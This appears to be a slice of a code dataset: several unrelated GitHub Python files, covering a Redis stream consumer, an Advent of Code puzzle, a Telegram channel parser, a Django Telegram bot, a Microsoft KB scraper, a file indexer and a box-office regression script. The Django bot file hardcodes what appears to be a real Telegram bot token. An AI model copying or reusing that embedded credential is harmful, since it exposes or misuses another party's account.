obj = result[1][0][1]\n product_id = obj['product_id']\n product_key = f':inventory.main.Product:{product_id}'\n product_data = redis.hgetall(product_key)\n if product_data:\n quantity = int(obj['quantity'])\n product_quantity = int(product_data['quantity'])\n if product_quantity >= quantity:\n redis.hmset(product_key, {'quantity': str(product_quantity - quantity).encode()})\n print(f\"Updated product: {product_id}\")\n redis.xack(inventory_key, inventory_group, result[1][0][0])\n else:\n print(f\"Insufficient inventory for product: {product_id}\")\n redis.xadd('refund_order', obj, '*')\n else:\n print(f\"Product not found with ID: {product_id}\")\n redis.xadd('refund_order', obj, '*')\n\n\nwhile True:\n payment_results = read_stream(payment_group, payment_consumer, payment_key)\n process_payment(payment_results)\n\n inventory_results = read_stream(inventory_group, inventory_consumer, inventory_key)\n process_inventory(inventory_results)\n\n time.sleep(1)\n\n\n# This script has two main functions: `process_payment` and `process_inventory` that process payment\n# and inventory related messages from Redis streams respectively. The `create_group` function is used\n# to create a consumer group for a given stream. 
The `read_stream` function is used to read messages\n# from a Redis stream.\n#\n# The script has the following variables:\n# - `payment_key`: the key of the Redis stream where payment messages are sent.\n# - `payment_group`: the name of the consumer group for payment messages.\n# - `payment_consumer`: the name of the payment consumer.\n# - `inventory_key`: the key of the Redis stream where inventory messages are sent.\n# - `inventory_group`: the name of the consumer group for inventory messages.\n# - `inventory_consumer`: the name of the inventory consumer.\n#\n# The `process_payment` function processes payment messages from the Redis stream. It loops through each message in\n# the `results` list and refunds the corresponding order by setting its status to \"refunded\" in Redis. It then\n# acknowledges the message by calling `redis.xack`.\n#\n# The `process_inventory` function processes inventory messages from the Redis stream. It loops through each message\n# in the `results` list and updates the corresponding product's quantity in Redis if there is sufficient inventory.\n# If there is not enough inventory, it adds the message to the `refund_order` stream by calling `redis.xadd`.\n#\n# The `read_stream` function continuously reads messages from a Redis stream. It returns a list of tuples,\n# where each tuple represents a message. The `while` loop at the end of the script continuously reads payment and\n# inventory messages from their respective streams using the `read_stream` function, and processes them using the\n# `process_payment` and `process_inventory` functions, respectively. It then sleeps for 1 second before starting\n# the loop again.\n","repo_name":"MaksimKisliak/FastAPI-services","sub_path":"consumer_managers.py","file_name":"consumer_managers.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42497268597","text":"# Sébastien Touzé\n# Script for Advent Of Code 2021\n# DAY 07\n\ndef load_file(filename):\n file = open(filename)\n\n positions = file.readline().split(',')\n positions = list(map(int, positions))\n\n pos_min = min(positions)\n pos_max = max(positions)\n\n return positions, pos_min, pos_max\n\n\ndef do_part1(filename):\n positions, pos_min, pos_max = load_file(filename)\n\n # this variable will store the end values : optimum position, fuel used. 
Initialized with fuel big enough so that\n # first run with pos_min must be better\n optimum = [pos_min, sum(positions)]\n for optimum_candidate in range(pos_min, pos_max + 1):\n dist_total = 0\n for i in range(len(positions)):\n dist_total += abs(positions[i] - optimum_candidate)\n if dist_total < optimum[1]:\n optimum = [optimum_candidate, dist_total]\n\n print(optimum)\n\n\ndef do_part2(filename):\n positions, pos_min, pos_max = load_file(filename)\n\n optimum = [pos_min, pow(sum(positions) + 1, 2)]\n for optimum_candidate in range(pos_min, pos_max + 1):\n dist_total = 0\n for i in range(len(positions)):\n dist = abs(positions[i] - optimum_candidate)\n dist_total += dist * (1 + dist) / 2 # Arithmetic sum\n if dist_total < optimum[1]:\n optimum = [optimum_candidate, dist_total]\n\n print(optimum)\n\n\nprint(\"### Part 1 ###\")\ndo_part1('data/day7input')\n\nprint(\"### Part 2 ###\")\ndo_part2('data/day7example')\ndo_part2('data/day7input')\n\n\n","repo_name":"SebastienTouze/advent_of_code_2021","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43529112331","text":"from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom Utilities.LargeDataProcessing.Sampling import sample_patches\nfrom eolearn.core import FeatureType\nimport lightgbm as lgb\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix, plot_confusion_matrix\nfrom sklearn.linear_model import LogisticRegression\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport scipy.cluster.hierarchy as sch\nfrom sklearn import tree\nfrom streamdm import HoeffdingTree, HoeffdingAdaptiveTree, NaiveBayes, LogisticRegression, MajorityClass, Perceptron, \\\n Bagging\nfrom .classification_comparison import get_data, fit_predict, class_names\n\nmethods = [\n #{\n # 'name': 'Decision Tree (scikit-learn)',\n # 'ctor': DecisionTreeClassifier,\n # 'params': {}\n #},\n {\n 'name': 'Hoeffding Tree (streamDM)',\n 'ctor': HoeffdingTree,\n 'params': {\n 'max_byte_size': 33554432,\n 'memory_estimate_period': 1000000,\n 'grace_period': 200,\n 'split_confidence': 0.0000001,\n 'tie_threshold': 0.05,\n 'binary_splits': False,\n 'stop_mem_management': False,\n 'remove_poor_atts': False,\n 'leaf_learner': 'NB',\n 'bb_threshold': 0,\n 'tree_property_index_list': \"\",\n 'no_pre_prune': False\n }\n },\n {\n 'name': 'Hoeffding Adaptive Tree (streamDM)',\n 'ctor': HoeffdingAdaptiveTree,\n 'params': {\n 'max_byte_size': 33554432,\n 'memory_estimate_period': 1000000,\n 'grace_period': 200,\n 'split_confidence': 0.0000001,\n 'tie_threshold': 0.05,\n 'binary_splits': False,\n 'stop_mem_management': False,\n 'remove_poor_atts': False,\n 'leaf_learner': 'NB',\n 'bb_threshold': 0,\n 'tree_property_index_list': \"\",\n 'no_pre_prune': False\n }\n },\n {\n 'name': 'Bagging (streamDM)',\n 'ctor': Bagging,\n 'params': {\n 'ensemble_size': 10,\n 'learner': {\n 'name': 'HoeffdingTree',\n 'max_byte_size': 33554432,\n 'memory_estimate_period': 1000000,\n 'grace_period': 200,\n 'split_confidence': 0.0000001,\n 'tie_threshold': 0.05,\n 'binary_splits': False,\n 'stop_mem_management': False,\n 'remove_poor_atts': False,\n 'leaf_learner': 'NB',\n 'bb_threshold': 0,\n 'tree_property_index_list': \"\",\n 'no_pre_prune': False\n 
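# note: the nested 'learner' mapping above configures the HoeffdingTree base model used by the bagging ensemble\n 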
}\n }\n },\n {\n 'name': 'Naive Bayes (streamDM)',\n 'ctor': NaiveBayes,\n 'params': {}\n },\n {\n 'name': 'Logistic Regression (streamDM)',\n 'ctor': LogisticRegression,\n 'params': {\n 'learning_ratio': 0.01,\n 'lambda': 0.0001\n }\n },\n {\n 'name': 'Perceptron (streamDM)',\n 'ctor': Perceptron,\n 'params': {\n 'learning_ratio': 1.0\n }\n },\n {\n 'name': 'Majority Class (streamDM)',\n 'ctor': MajorityClass,\n 'params': {}\n }\n]\n\nif __name__ == '__main__':\n\n # x, y = get_data('../Utilities/LargeDataProcessing/Samples/enriched_samples9797.csv')\n x, y = get_data('/home/beno/Documents/IJS/Perceptive-Sentinel/enriched_samples10000.csv')\n\n for method in methods:\n learner = method['ctor']()\n learner.set_params(**method['params'])\n fit_predict(x, y, learner, class_names, method['name'])\n","repo_name":"E3-JSI-archive/PerceptiveSentinel","sub_path":"Classification/stream_comparison.py","file_name":"stream_comparison.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"32004194694","text":"from telethon.tl.types import MessageEntityTextUrl\nfrom glob import glob\nfrom dateutil.relativedelta import relativedelta # pip3 install python-dateutil\n\nimport datetime\nimport os\n\n\ndef get_channel_id(client, link): # get the channel ID\n m = client.get_messages(link, limit=1)\n channel_id = m[0].peer_id.channel_id\n return str(channel_id)\n\n\ndef clearify_text(msg): # strip hyperlink characters from the text\n text = msg.message\n text_splitted = text.split()\n text_listed = [word for word in text_splitted if word != ' ']\n return \" \".join(text_listed)\n\n\ndef get_message_content(client, msg, url, channel_name, directory_name): # get the message content\n msg_date = str(msg.date) # date the message was sent\n msg_url = url + '/' + str(msg.id) # build the link to the message\n file = open(f\"{channel_name}/{directory_name}/{directory_name}_meta.txt\", 'a+') # write the message metadata\n file.write(msg_url)\n file.write('\\n' + msg_date)\n file.close()\n if msg.message: # if the message contains text, write that text to a text file in the message folder\n text = clearify_text(msg=msg)\n file = open(f\"{channel_name}/{directory_name}/{directory_name}.txt\", \"w\")\n file.write(text)\n file.close()\n if msg.media: # if the message contains media (photos, videos, documents, files), download the media into the message folder\n client.download_media(message=msg, file=f\"{channel_name}/{directory_name}\")\n if msg.entities: # write the hyperlinks from the message text to the message file\n urls = [ent.url for ent in msg.entities if isinstance(ent, MessageEntityTextUrl)]\n file = open(f\"{channel_name}/{directory_name}/{directory_name}.txt\", mode='a+')\n for u in urls:\n file.write('\\n' + u)\n file.close()\n\n\ndef find_last_parsed_date(path): # determine the date to start parsing from\n paths = glob(f\"{path}/*/*meta.txt\", recursive=True) # look for existing metadata of already collected messages\n oldest = datetime.datetime.strptime(\"1970-01-01 00:00:00+00:00\", \"%Y-%m-%d %H:%M:%S%z\")\n temp = oldest\n for p in paths: # find the send date of the latest message\n with open(p, 'r') as file:\n date = datetime.datetime.strptime(file.readlines()[-1], \"%Y-%m-%d %H:%M:%S%z\")\n if date > oldest:\n oldest = date\n if temp == oldest:\n oldest = datetime.datetime.now() - relativedelta(months=3) # if there are no messages, the offset is set to\n # three months before the current date\n return oldest\n\n\ndef 
parse(client, url): # collect messages from the channel\n err = [] # holds any errors encountered\n channel_id = get_channel_id(client, url) # get the channel ID\n os.makedirs(channel_id, exist_ok=True) # create the channel folder in the current directory\n oldest = find_last_parsed_date(channel_id) # get the date to start parsing from\n for message in client.iter_messages(url, reverse=True, offset_date=oldest): # iterator over messages (url is the link\n # to the channel, reverse iterates from old\n # to new, offset_date is the date to\n # start parsing from\n try:\n directory_name = str(message.id) # get the message ID\n os.makedirs(f\"{channel_id}/{directory_name}\", exist_ok=True) # create the message folder\n get_message_content(client, message, url, channel_id, directory_name) # process the message\n\n except Exception as passing: # error handling\n err.append(passing)\n continue\n return err # return any errors\n","repo_name":"mmat16/telegram_channel_parser","sub_path":"parser_functions.py","file_name":"parser_functions.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"ru","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
{"seq_id":"9981011369","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport requests\nimport sys\nfrom datetime import datetime\n\nSUPPORTED_BUILDS = {\n 6002: 'https://support.microsoft.com/en-us/help/4343218', # 2008 SP2\n 7601: 'https://support.microsoft.com/en-us/help/4009469', # 7 / 2008R2 SP1\n 9200: 'https://support.microsoft.com/en-us/help/4009471', # 2012\n 9600: 'https://support.microsoft.com/en-us/help/4009470', # 8.1 / 2012R2\n 10240: 'https://support.microsoft.com/en-us/help/4000823', # Windows 10 1507 \"RTM\" \"Threshold 1\"\n 10586: 'https://support.microsoft.com/en-us/help/4000824', # Windows 10 1511 \"November Update\" \"Threshold 2\"\n 14393: 'https://support.microsoft.com/en-us/help/4000825', # Windows 10 1607 \"Anniversary Update\" \"Redstone 1\" / Server 2016\n 15063: 'https://support.microsoft.com/en-us/help/4018124', # Windows 10 1703 \"Creators Update\" \"Redstone 2\"\n 16299: 'https://support.microsoft.com/en-us/help/4043454', # Windows 10 1709 \"Fall Creators Update\" \"Redstone 3\"\n 17134: 'https://support.microsoft.com/en-us/help/4099479', # Windows 10 1803 \"Redstone 4\"\n 17763: 'https://support.microsoft.com/en-us/help/4464619', # Windows 10 1809 \"Redstone 5\" / Server 2019\n}\nBEGIN_MARKER = '\"minorVersions\":'\nEND_MARKER = ']\\n'\nDATE_FORMAT = '%Y-%m-%dT%H:%M:%S'\n\n# Update types and whether they are cumulative or not\nUPDATE_TYPES = {\n '': False, # legacy discontinued non-cumulative updates\n 'security-only update': False,\n 'monthly rollup': True,\n 'os build monthly rollup': True,\n 'preview of monthly rollup': True,\n}\n\ndef fetch_security_updates(url):\n html = requests.get(url).text\n html = html.replace('\\r\\n', '\\n')\n json_begin = html.find(BEGIN_MARKER)\n if json_begin == -1:\n sys.stderr.write('Unable to find marker {} in {}\\n'.format(\n BEGIN_MARKER, url))\n sys.exit(1)\n json_begin += len(BEGIN_MARKER)\n json_end = html.find(END_MARKER, json_begin)\n if json_end == -1:\n sys.stderr.write('Unable to find marker {} in {}\\n'.format(\n END_MARKER, url))\n sys.exit(1)\n json_end += len(END_MARKER)\n updates_json = html[json_begin:json_end]\n updates_json = json.loads(updates_json)\n updates = []\n for update in updates_json:\n if not set(('releaseVersion','id','releaseDate')).issubset(set(update.keys())):\n sys.stderr.write('Can\'t handle updates without 
id/releaseVersion/releaseDate\\n')\n sys.exit(1)\n update_type = update['releaseVersion'].lower().strip()\n if 'os build' in update_type: # new >= 10.0 updates type name format, they are all cumulative\n update_type = 'monthly rollup'\n if update_type not in UPDATE_TYPES:\n sys.stderr.write('Update with unknown releaseVersion \"{}\"\\n'.format(\n update['releaseVersion']))\n sys.stderr.write('\\n' + str(update) + '\\n')\n sys.exit(1)\n is_cumulative = UPDATE_TYPES[update_type]\n date = datetime.strptime(update['releaseDate'], DATE_FORMAT).date()\n updates.append((date, is_cumulative, update['id']))\n updates.sort(key=lambda x: x[0])\n return updates\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv', type=argparse.FileType('w'), default=None)\n parser.add_argument('--sql', type=argparse.FileType('w'), default=None)\n args = parser.parse_args()\n if args.sql is None and args.csv is None:\n args.csv = sys.stdout\n if args.csv is not None:\n args.csv.write('build_number\\tis_cumulative\\tpublish_date\\tkb_id\\n')\n for build, url in SUPPORTED_BUILDS.items():\n updates = fetch_security_updates(url)\n for (date, is_cumulative, kb) in updates:\n args.csv.write('{}\\t{}\\t{}/{}/{}\\t{}\\n'.format(build,\n (\"1\" if is_cumulative else \"0\"),\n date.year, date.month, date.day, kb))\n if args.sql is not None:\n args.sql.write('\\n')\n args.sql.write('''CREATE TABLE [kb_list](\n [build] [int] NOT NULL,\n [cumulative] [bit] NOT NULL,\n\t [id] [varchar](255) NOT NULL,\n\t [date] [date] NOT NULL)\\n''')\n args.sql.write('INSERT INTO [kb_list] VALUES ')\n sql = []\n for build, url in SUPPORTED_BUILDS.items():\n updates = fetch_security_updates(url)\n for (date, is_cumulative, kb) in updates:\n sql.append(\"({},{},'KB{}','{}-{}-{}')\".format(\n build, (1 if is_cumulative else 0), kb,\n date.year, date.month, date.day))\n args.sql.write(',\\n '.join(sql) + ';')\n\n","repo_name":"mtth-bfft/kblist","sub_path":"kblist.py","file_name":"kblist.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"71958617334","text":"from django.shortcuts import render, get_object_or_404, reverse\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, Http404, HttpResponseForbidden, HttpResponseBadRequest, JsonResponse\nfrom .parser import parse_intercept_rss\nfrom django.views.generic import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport json\nimport telepot\n\nTOKEN = '605347574:AAFLA9YzWE7JnPxK31uCOESsv7X9OSoacrI'\t# temporary token key for my bot\n\nAlekiBot = telepot.Bot(TOKEN)\n\ndef display_help():\n\treturn render_to_string('help.md')\n\ndef display_intercept_feed():\n\treturn render_to_string('feed.md', {'items': parse_intercept_rss()})\n\nclass CommandReceiveView(View):\n\t\"\"\"receives a post request and handles it according to the command\"\"\"\n\tdef post(self, request, bot_token):\n\t\tif bot_token != TOKEN:\n\t\t\treturn HttpResponseForbidden('Invalid token')\n\n\t\tcommands = {\n\t\t\t'start/': display_help,\n\t\t\t'help': display_help,\n\t\t\t'feed': display_intercept_feed,\n\t\t}\n\n\t\ttry:\n\t\t\tpayload = json.loads(request.body.decode('utf-8'))\n\t\texcept ValueError:\n\t\t\treturn HttpResponseBadRequest('invalid request body')\n\t\telse:\n\t\t\tchat_id = payload['message']['chat']['id']\n\t\t\tcmd = payload['message'].get('text')\n\t\t\tfunc = commands.get(cmd.split()[0].lower())\n\t\t\tif func:\n\t\t\t\tAlekiBot.sendMessage(chat_id, func(), 
parse_mode='Markdown')\n\t\t\telse:\n\t\t\t\tAlekiBot.sendMessage(chat_id, 'I do not understand you sir')\n\n\t\treturn JsonResponse({}, status=200)\n\n\n\t@method_decorator(csrf_exempt)\n\tdef dispatch(self, request, *args, **kwargs):\n\t\treturn super(CommandReceiveView, self).dispatch(request, *args, **kwargs)\n\n\n\n\n\n\n\n\n\n","repo_name":"alexmzirai/DjangoBot","sub_path":"djangobot/bot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"13145252900","text":"#!/usr/bin/python3\n\"\"\"Example to read a text file.\"\"\"\n\n#with open('text_files/pi_digits.txt') as file_object:\n #contents = file_object.read()\n #print(contents.rstrip())\n\n# Absolute file path\n#file_path = '/home/humberto/Documents/Repositories/practices/python/PythonCrashCourse/PartI/Chapter10/text_files/pi_digits.txt'\n# Relative file path\nfile_path = 'text_files/pi_digits.txt'\n\n#with open(file_path) as file_object:\n #contents = file_object.read()\n #print(contents.rstrip())\n\n#with open(file_path) as file_object:\n #for line in file_object:\n #print(line.rstrip())\n\nwith open(file_path) as file_object:\n lines = file_object.readlines()\n\nfor line in lines:\n print(line.rstrip())\n","repo_name":"humbertoperdomo/practices","sub_path":"python/PythonCrashCourse/PartI/Chapter10/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"23575456211","text":"\"\"\"Index of files in a directory structure.\"\"\"\nimport collections\nimport contextlib\nimport logging\nimport pathlib\nimport sqlite3\nimport typing as t\n\nimport click\nimport tqdm\n\nfrom findex.db import Storage, opened_storage\nfrom findex.fs import FileDesc, FILEHASH_WALK_ERROR, count_files, walk\n\nMETA_ROOT_SPECIFIED = \"ROOT_SPECIFIED\"\nMETA_ROOT_RESOLVED = \"ROOT_RESOLVED\"\n\n_logger = logging.getLogger(__name__)\n\n\nclass Index(Storage):\n \"\"\"Index of file paths by content, based on sqlite.\"\"\"\n\n def create(self, path: pathlib.Path):\n \"\"\"Create index of given directory.\"\"\"\n\n _logger.info(f\"Creating index of {path}.\")\n self.create_db()\n errors = []\n\n def _on_error(error: OSError):\n _logger.warning(error)\n errors.append(\n FileDesc(\n path=str(pathlib.Path(error.filename).relative_to(path)),\n size=0,\n fhash=FILEHASH_WALK_ERROR.format(message=error.strerror),\n created=None,\n modified=None,\n )\n )\n\n click.echo(f\"Counting files in {path}...\")\n count = count_files(path, _on_error)\n\n with opened_storage(self):\n self._put_meta(META_ROOT_SPECIFIED, str(path))\n self._put_meta(META_ROOT_RESOLVED, str(path.resolve()))\n\n _logger.debug(f\"Writing {len(errors)} walk errors to database.\")\n for errordesc in errors:\n self._add_file(errordesc)\n\n _logger.info(f\"Found {count} files to be added to index.\")\n for filedesc in tqdm.tqdm(\n walk(path), total=count, desc=\"Read\", unit=\"files\"\n ):\n self._add_file(filedesc)\n self._on_update()\n\n def _add_file(self, filedesc: FileDesc):\n try:\n self.connection.execute(\n \"INSERT INTO file (path,size,hash,created,modified)\"\n \" VALUES (?,?,?,datetime(?),datetime(?));\",\n filedesc,\n )\n except sqlite3.OperationalError:\n _logger.error(f\"Cannot add file to database: {filedesc}\")\n raise\n\n def count(self):\n with opened_storage(self):\n return self.connection.execute(\"SELECT COUNT(*) from 
file\").fetchone()[0]\n\n def iter_all(self):\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n \"SELECT path,size,hash,created,modified from file\"\n ):\n yield FileDesc._make(row)\n\n\nFilesMap = collections.namedtuple(\"FilesMap\", \"fhash size files1 files2\")\n\"\"\"Files in comparison with identical content hash.\"\"\"\n\n\nclass Comparison(Storage):\n \"\"\"Comparison of two index databases.\"\"\"\n\n def create(self, index1: Index, index2: Index):\n \"\"\"Create comparison of two file index files.\"\"\"\n\n _logger.info(f\"Creating comparison {self.path}.\")\n\n self.create_db()\n\n with opened_storage(self):\n click.echo(f\"\\nAdding data from {index1.path}.\")\n self._add_index(index1, \"1\")\n click.echo(f\"\\nAdding data from {index2.path}.\")\n self._add_index(index2, \"2\")\n\n def _add_index(self, index: Index, table_suffix: str):\n for file in tqdm.tqdm(index.iter_all(), total=index.count(), unit=\"files\"):\n self._add_file(file, f\"file{table_suffix}\")\n self._on_update()\n\n # copy meta data of index:\n for key, value in index.iter_meta():\n self._put_meta(self._index_key(key, table_suffix), value)\n\n @staticmethod\n def _index_key(key: str, table_suffix: str) -> str:\n return f\"INDEX{table_suffix}_{key}\"\n\n def get_index_meta(self, key: str, table_suffix: str) -> t.Optional[str]:\n return self.get_meta(self._index_key(key, table_suffix))\n\n def _add_file(self, filedesc: FileDesc, table: str):\n try:\n self.connection.execute(\n f\"INSERT INTO {table} (path,size,hash,created,modified)\"\n f\" VALUES (?,?,?,datetime(?),datetime(?));\",\n filedesc,\n )\n except sqlite3.OperationalError:\n _logger.error(f\"Cannot add file to database: {filedesc}\")\n raise\n\n def _iter_exclusive_files(\n self, table_contained, table_not_contained, *, include_updated=False\n ):\n \"\"\"Return files only in table_contained, but not in table_not_contained.\"\"\"\n assert table_contained != table_not_contained\n\n if include_updated:\n excluded_paths = {}\n else:\n excluded_paths = {f.path for f in self.iter_updated()}\n\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n f\"SELECT \"\n f\" {table_contained}.path,\"\n f\" {table_contained}.size,\"\n f\" {table_contained}.hash,\"\n f\" {table_contained}.created,\"\n f\" {table_contained}.modified \"\n f\"FROM {table_contained} LEFT OUTER JOIN {table_not_contained} \"\n f\" ON {table_contained}.hash = {table_not_contained}.hash \"\n f\"WHERE {table_not_contained}.hash IS NULL \"\n f\"ORDER BY {table_contained}.path\"\n ):\n file = FileDesc._make(row)\n\n if file.path not in excluded_paths:\n yield file\n\n def iter_missing(self, *, include_updated=False):\n \"\"\"Return files only in index 1, but not in 2.\"\"\"\n return self._iter_exclusive_files(\n \"file1\", \"file2\", include_updated=include_updated\n )\n\n def iter_new(self, *, include_updated=False):\n \"\"\"Return files only in index 2, but not in 1.\"\"\"\n return self._iter_exclusive_files(\n \"file2\", \"file1\", include_updated=include_updated\n )\n\n def iter_updated(self):\n \"\"\"Return files that have an identical path but different hashes.\"\"\"\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n \"SELECT \"\n \" file1.path,\"\n \" file1.size,\"\n \" file1.hash,\"\n \" file1.created,\"\n \" file1.modified \"\n \"FROM file1 JOIN file2 \"\n \" ON file1.path = 
file2.path \"\n \"WHERE file1.hash != file2.hash \"\n \"ORDER BY file1.path\"\n ):\n yield FileDesc._make(row)\n\n def iter_content_groups(self):\n \"\"\"Return list of pairs of paths in index 1 and index 2 that have identical content.\n\n In case of duplicates in an index, there is possibly more than one file in each of the\n pairs' elements.\n \"\"\"\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n \"SELECT \"\n \" file1.hash,\"\n \" file1.size,\"\n \" group_concat(DISTINCT file1.path) AS files1,\"\n \" group_concat(DISTINCT file2.path) AS files2 \"\n \"FROM file1 JOIN file2 \"\n \" ON file1.hash == file2.hash \"\n \"GROUP BY file1.hash,file1.size \"\n \"ORDER BY files1\"\n ):\n fmap = FilesMap._make(row)\n\n # unpack CSV fields:\n yield fmap._replace(\n files1=fmap.files1.split(\",\"), files2=fmap.files2.split(\",\")\n )\n\n def report_raw(self):\n click.echo()\n click.secho(\"Missing files:\", underline=True, bold=True, fg=\"bright_cyan\")\n click.echo(\"\\n\".join(f.path for f in self.iter_missing()))\n\n click.echo()\n click.secho(\"New files:\", underline=True, bold=True, fg=\"bright_cyan\")\n click.echo(\"\\n\".join(f.path for f in self.iter_new()))\n\n click.echo()\n click.secho(\"Updated files:\", underline=True, bold=True, fg=\"bright_cyan\")\n click.echo(\"\\n\".join(f.path for f in self.iter_updated()))\n\n click.echo()\n click.secho(\"Identical files:\", underline=True, bold=True, fg=\"bright_cyan\")\n num_groups = sum(1 for _ in self.iter_content_groups())\n click.echo(f\"{num_groups} groups with identical content in both indices.\")\n","repo_name":"moltob/findex","sub_path":"findex/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28912203873","text":"from typing import Optional\nfrom list_node import ListNode\n\nclass Solution:\n def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:\n if not head or not head.next:\n return None\n\n left, right = head, head\n\n while n > 0:\n right = right.next\n n -= 1\n\n prev_left = None\n\n while right is not None:\n prev_left = left\n left = left.next\n right = right.next\n\n next_left = left.next\n if prev_left is None:\n head = next_left\n else:\n prev_left.next = next_left\n\n return head\n","repo_name":"ysakiyev/31github","sub_path":"neetcode_150/linked_lists/19_remove_nth_node_from_end.py","file_name":"19_remove_nth_node_from_end.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12022775168","text":"#imports\n\nimport numpy as np\nimport pandas as pd\n\nfrom collections import Counter\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_log_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.ensemble import BaggingRegressor, AdaBoostRegressor, ExtraTreesRegressor, RandomForestRegressor\nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.metrics import confusion_matrix, cohen_kappa_score, classification_report\nfrom sklearn.model_selection import cross_val_score\n\nimport ast\n\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\nimport 
matplotlib.pyplot as plt\n\n# reading the csv \n\n\nboxoffice_df = pd.read_csv('train.csv', index_col=None)\n\ndict_columns = ['genres']\n\ndef text_to_dict(df):\n for column in dict_columns:\n df[column] = df[column].apply(lambda x: {} if pd.isna(x) else ast.literal_eval(x) )\n return df\n\nboxoffice_df = text_to_dict(boxoffice_df)\n# pre-analysis\n\nprint(boxoffice_df.head(10))\nprint(boxoffice_df.dtypes)\n\n#genre filling\nfor i, e in enumerate(boxoffice_df['genres'][:5]):\n print(i, e)\n \nlist_of_genres = list(boxoffice_df['genres'].apply(lambda x: [i['name'] for i in x] if x != {} else []).values)\nprint(Counter([i for j in list_of_genres for i in j]).most_common())\n\nboxoffice_df['num_genres'] = boxoffice_df['genres'].apply(lambda x: len(x) if x != {} else 0)\nboxoffice_df['all_genres'] = boxoffice_df['genres'].apply(lambda x: ' '.join(sorted([i['name'] for i in x])) if x != {} else '')\ntop_genres = [m[0] for m in Counter([i for j in list_of_genres for i in j]).most_common(15)]\nfor g in top_genres:\n boxoffice_df['genre_' + g] = boxoffice_df['all_genres'].apply(lambda x: 1 if g in x else 0)\n \nboxoffice_df = boxoffice_df.drop(['genres'], axis=1)\n\n#outliers\n\nbudget_data = boxoffice_df['budget']\npopularity_data = boxoffice_df['popularity']\n# plt.boxplot(popularity_data)\n# plt.show()\n\nbudget_upper_limit = 200000000\npopularity_upper_limit = 75\n\npopularity_data.loc[boxoffice_df['popularity']>popularity_upper_limit] = popularity_upper_limit\nbudget_data.loc[boxoffice_df['budget']>budget_upper_limit] = budget_upper_limit\n\n# plt.boxplot(popularity_data)\n# plt.show()\n\n# print(\"Number of genres in films:\")\n# print(boxoffice_df['genres'].apply(lambda x: len(x) if x != {} else 0).value_counts())\n\n\n#data preparation\n\n\nprocessed_df = boxoffice_df.drop(['belongs_to_collection','homepage','overview','poster_path','production_companies','imdb_id',\n 'spoken_languages','production_countries','tagline','Keywords','cast','crew'],axis=1)\n\n# filling missing attributes\n\nprocessed_df.runtime.fillna(value=processed_df.runtime.mean(),inplace=True)\nprint(processed_df.dtypes)\nprint(processed_df.apply(lambda x: x.isnull().any()))\n\n\nprint(processed_df.head(10))\n\n#strings to categorical features\nprocessed_df['original_language'] = processed_df.original_language.astype('category')\nprocessed_df['original_title'] = processed_df.original_title.astype('category')\nprocessed_df['release_date'] = processed_df.release_date.astype('category')\nprocessed_df['status'] = processed_df.status.astype('category')\nprocessed_df['title'] = processed_df.title.astype('category')\nprocessed_df['all_genres'] = processed_df.all_genres.astype('category')\n\nprocessed_df['original_language'] = pd.get_dummies(processed_df['original_language'])\nprocessed_df['original_title'] = pd.get_dummies(processed_df['original_title'])\nprocessed_df['release_date'] = pd.get_dummies(processed_df['release_date'])\nprocessed_df['status'] = pd.get_dummies(processed_df['status'])\nprocessed_df['title'] = pd.get_dummies(processed_df['title'])\nprocessed_df['all_genres'] = pd.get_dummies(processed_df['all_genres'])\n\n\n# separate class from features\ndata_features = processed_df.drop(['revenue'],axis=1).values\ndata_labels = processed_df['revenue'].values\n\n\n\n#pca \n\n\npca = PCA(n_components=4)\nfit = pca.fit(data_features)\nprint(\"Explained Variance:\")\nprint(fit.explained_variance_ratio_)\nprint(fit.components_)\n\n#univariate selection \n# test = SelectKBest(score_func=f_classif,k=4)\n# fit = 
